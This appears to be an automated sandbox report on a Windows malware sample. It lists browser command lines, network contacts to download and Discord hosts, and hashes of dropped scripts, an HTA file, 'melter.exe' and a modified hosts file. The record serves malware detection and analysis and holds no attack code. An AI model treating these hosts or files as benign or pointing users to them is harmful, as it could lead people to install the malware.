"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=17596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=17764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa8b2946f8,0x7ffa8b294708,0x7ffa8b294718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7640034691446923627,8548927641122100204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=18924 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
NL 172.217.23.195:443 gstatic.com tcp
US 8.8.8.8:53 image.noelshack.com udp
US 35.227.215.6:443 image.noelshack.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ddl8.data.hu udp
HU 217.65.97.74:443 ddl8.data.hu tcp
US 8.8.8.8:53 195.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 6.215.227.35.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 74.97.65.217.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 theshitposter78.github.io udp
US 185.199.111.153:80 theshitposter78.github.io tcp
US 185.199.111.153:80 theshitposter78.github.io tcp
US 8.8.8.8:53 twitter.com udp
US 8.8.8.8:53 help.github.com udp
US 8.8.8.8:53 githubstatus.com udp
US 8.8.8.8:53 153.111.199.185.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\8628.tmp\8629.tmp\862A.bat

MD5 0a45f9a236bbcd265c0c42f31a98b97f
SHA1 c959b0487c1ab6ed111bee3d1f80bcc3032125a4
SHA256 38e4173ae8927a3bea9499ab2b9141d8f42f39383478633b0a4b98c0c661d0ff
SHA512 2935422f584afd8fde06d8838621c94205aa2ae67397b1d3ed3cb2e4d80d67e53d84cef2eaae4d3ea3c4dfc5e9282d712aab458dcd29660f9ae1215258fa1c72

memory/5012-2-0x000001F72EA40000-0x000001F72EA80000-memory.dmp

memory/5012-3-0x00007FFA7AED3000-0x00007FFA7AED5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\21446.vbs

MD5 135594160762ab9dd80794d7b34ab32a
SHA1 638fef88bbb5d310c51eda07ca10918a482ad3ac
SHA256 531eef292dba871300a5b31d9601bab2b8c03be17cc0aa28e216f82a5df01fa0
SHA512 19a8b0024abb6e22103aaf8654619ee803cb8ae2bfd21d6bb7c648a4dfb1a06936144d308cc3d0ebdd86d38b87434d2e3a152f541153d42d03b4ad767b72b54d

C:\Users\Admin\AppData\Local\Temp\14329.vbs

MD5 93e179454db6fe9ac81112193de37cde
SHA1 4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9
SHA256 8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc
SHA512 a38411dd6eb30050e6100bd20e79e8f4d650c1a4ad646516370f603a28900dfc424292f83cd7b49b1296bf7b25ce6ce907ef8dee964ded2e6b79475a6741f207

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3yur3e1.qnu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3252-101-0x0000015E7CBD0000-0x0000015E7CBF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/5012-128-0x000001F749210000-0x000001F749286000-memory.dmp

memory/5012-129-0x000001F7309A0000-0x000001F7309F0000-memory.dmp

memory/5012-130-0x000001F7307F0000-0x000001F73080E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e136966aba3500e5d57bcfc57edb3be1
SHA1 3dc5f1c1888b68da52706fb5fb053a86d5ac4c8d
SHA256 55f1c311ffec50f6d364764298fcb3172f034ad47b32eea2941bdaab95e369b0
SHA512 118f09f6b0a690641abbae52d5e4fa71493553eadcaee9639e59d671ce64576709b3ec3d94e9cfd066f94774590f76de0796d503c73e432f0f3412f5a97aed81

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/5012-167-0x000001F7309F0000-0x000001F730A02000-memory.dmp

memory/5012-166-0x000001F7307E0000-0x000001F7307EA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 780c9e943c93d8d5153446d3b871f2e6
SHA1 51c12c1c0df8840710db5973512ba1256b8a43ef
SHA256 70173b0f420b7b4ae05e5f2a0f0588cf99206f93e62c67a7847e7028eaa2d0bc
SHA512 b5859b2d51bfd5118ef163b16ad8cc8ff19c1e20f28596e0a88122361c1831ea62236b7ef6cae41e142aa02f3cffcc3825f9cc76d501fb02301e6dcc2f038b58

memory/5012-185-0x000001F749400000-0x000001F7495A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\19074.vbs

MD5 3a7e0a94fa88dccd40d9b76b37d06db1
SHA1 d7604ddb660898ce3b1343aa712cf5926bc68bda
SHA256 368a1589e414e50d554cf0d871bd49b11f9cd9f189876c86a5caef92d158e6a4
SHA512 19b8377a708301fb719e43433b9c0a592346ea94206870e3ba2c77f901b17598dd977fd711e591b5d0fc46982ed83e62cfbbe678eabe43de494bdde176c89fcb

C:\Users\Admin\AppData\Local\Temp\26117.vbs

MD5 aabbe725da9751315bbeeda4ef58d816
SHA1 476c78912d61e790a793c8e6606825f2b169947c
SHA256 0422247afae1a1556e7832c45f4f1913a61cbace2be53aad58967ea9e6315360
SHA512 0e1a523c947013a1a23574d125294270cb8c6b8e4fd97630f7c35122a33b9d95e7a073cbe23f0ed3f78246dd8b2db2c4401e994eace3b9e3bdbe696708b887dd

C:\Users\Admin\AppData\Local\Temp\risitas.hta

MD5 af25ddf889ed3804a85b487a95993a94
SHA1 e22ce7ce7e6b18400913de410be90fa79c2b6edb
SHA256 bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab
SHA512 8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

C:\Users\Admin\AppData\Local\Temp\19267.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\26847.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Temp\28486.vbs

MD5 e04b980f81eddd7fad10acdc27793002
SHA1 ad88c7e0bbaa4470a892af63b4ab1e0c460e09a8
SHA256 fd05de63104067166b2225248f89f5a8d9b86ae7c090b025e0b08f90054e0663
SHA512 636c561da9a8644d95bbcdb09f427c05012a3ce72c1dbfb430b156fcceffdf6708cd0a83133576eea8a070d16e01c4630e57c98f178c26c95d7767cb44025e36

C:\Users\Admin\AppData\Local\Temp\2561.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

MD5 90be2701c8112bebc6bd58a7de19846e
SHA1 a95be407036982392e2e684fb9ff6602ecad6f1e
SHA256 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf
SHA512 d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 5433eab10c6b5c6d55b7cbd302426a39
SHA1 c5b1604b3350dab290d081eecd5389a895c58de5
SHA256 23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131
SHA512 207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34

C:\Users\Admin\AppData\Local\Temp\19628.bat

MD5 4a9699c0d134b2b5b1f58cc33674f45c
SHA1 8ee1d4225898740ec63d56e9600cfc5c742bacaf
SHA256 ad38dbcd5d795409da32568d5c041f73504b20925de468bac980ffc68680e0bd
SHA512 97273ca0bdbb9711139b2c3fad93bd64c865d35b65ce2c60d108966ce0f9ff4ab137c03e8de466770322309bd40c431367e30d796fa85d5c03219b36e67111f7

C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg

MD5 597cf1068c84a5c01afd9472a7453116
SHA1 bc9a638c47aab57b04b2257f421a48b2ee682732
SHA256 0d124f8aedb0b4461c31ee54f6d68ba1288b47c373a9bfe6c1a323e958836799
SHA512 3eaf9c358446ed124817d34523ad6155629f5d4ad11770f918fff6096d1d6f66ee790fac8488b908b424fd4761f0b26011b3e0a2b21bca406f73ca3fe1e17600

C:\Users\Admin\AppData\Local\Temp\melter.exe

MD5 d9baac374cc96e41c9f86c669e53f61c
SHA1 b0ba67bfac3d23e718b3bfdfe120e5446d0229e8
SHA256 a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412
SHA512 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 27304926d60324abe74d7a4b571c35ea
SHA1 78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1
SHA256 7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de
SHA512 f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

C:\Windows\system32\drivers\etc\hosts

MD5 4028457913f9d08b06137643fe3e01bc
SHA1 a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512 c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

\??\pipe\LOCAL\crashpad_3528_FWPJZBHEYQSVHRXM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9e3fc58a8fb86c93d19e1500b873ef6f
SHA1 c6aae5f4e26f5570db5e14bba8d5061867a33b56
SHA256 828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4
SHA512 e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5904d22b7a7d0b409c154612d5c9e73a
SHA1 09731046730ed5511bb0e7d791fa3033c0b29dcb
SHA256 d4d114772a17e2c3619b08229bfbacb57a334a3670975d3d52afe51956e8719c
SHA512 320850e7d95f4fa4c0aa645de13568e9e917e97becdbf0f59348f5f63ab7f9f82910b04d7230fa6069b4d4b93d122cc053c9c4679d03c35aaf4f253e2988bd3c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 431611dbbfac1532ea886789ce4a4f4e
SHA1 08600489a2402949409a86f7b30b491de617c451
SHA256 6e4c1ec2b994bfd813f6bf068d18a90f6f154a5f7120c0a83339865e7f71b982
SHA512 55233fda5e2709a37f8a6a9bd661f0ec2f81b23708601a2ebb8899462fe5898acd7c3d1af5f76c75d548f47661afb75657ce33ef02e657ed7e62e6322a33d233

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 adfb12d9aba7f43b077bcfca967e2bf0
SHA1 e7fa7cce495efc0abf36638b80bebaf030553793
SHA256 7d0cfc3e5ea0c63fe3d1ea077bb9eba6e41bbe9c8f16ff638e2cc11e22730aea
SHA512 ac8e8e7dc4f9d3a6a5f8309478f14eb402fba4c8e5729ba2ae5b04546eff7aa83c0be73fb1c365478d7aef393517abec16e846520c717da96521610a9ffa9242

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c3e8ba63cdb802f857c24fb4baed47a1
SHA1 5cb885d6c504838fbe8dca49a2e669ffdc290f59
SHA256 523a0bb0e0ffc24fc63f9e9c1101fa7b91487a28d6e072f8087ac70c364b5d7e
SHA512 4905a0c53b90e6c7679e26a92808a141ededd52a871cf8c08521d91f37b2479536d3e227f72dac8b87e2548edf453792a21d0e6d770a1ef81178cfa53fc109cc

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 f7640224379c70282990e7666f550a53
SHA1 c71501245453f45286fc7f44279b47ef8ec1b302
SHA256 cce57199b5ece83a88716dc6dabec262d6d81093321bcf0f0681fbd7d60b1cff
SHA512 1a849dbc4766eab606b8b89113e2bd8a0f971ec756343582ed04108aa88377f15f9bd10982aea0c426da56b70c12e5aa4c9ecb45029db7ce3962f387bae074d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 13979ca1541a4fa642d22016f54da8b8
SHA1 f5cd127da0f904f4a018c15c1f56107c94732166
SHA256 b13e01e9c90f4db31c592f316b4734fb0ee861e97ef5f317b5f05b6abb73c644
SHA512 1bfaac20d6edd8ececa85bced61a88f7bfd32334487a4cde8ed0e40ac970bf0a3c9c351342870cfb4958e17ea128e34456f8c25ff15c76c8cff88e3fdb9c1558

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5bf0864afb53a1ad051c19ec9fcd6c1a
SHA1 00ab68484afd3b172e735d760ff29acb1b5965b0
SHA256 dd5ee5994faa231050fef003dcee0ef09828cec7a3a53023d8af4a8182066ddb
SHA512 74fac434e426e24f9b563624d8efe5c7be450a1d0d626b5b7f33071f965bf0fa273ed6746f7d760986af14a070e4063bb7631ad08b976d30dee4992b3cc4185f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RFe59b210.TMP

MD5 0f29ebd13630ac15ace97959d5eafae6
SHA1 09209087c4cea8210ebf3ff7962cbc35b359a5d5
SHA256 0c6881c836673e81b4cbced068b59834a1035e4f57af2af5819c08498b46d6f8
SHA512 f28391f9f5959d2fe820ff052724f8763c69928cee11f21ff2c25bd2e0aab02df57fe2deb4d9c7797961b104885c08e545c8c500fb471426eb7c01b086eb3c5d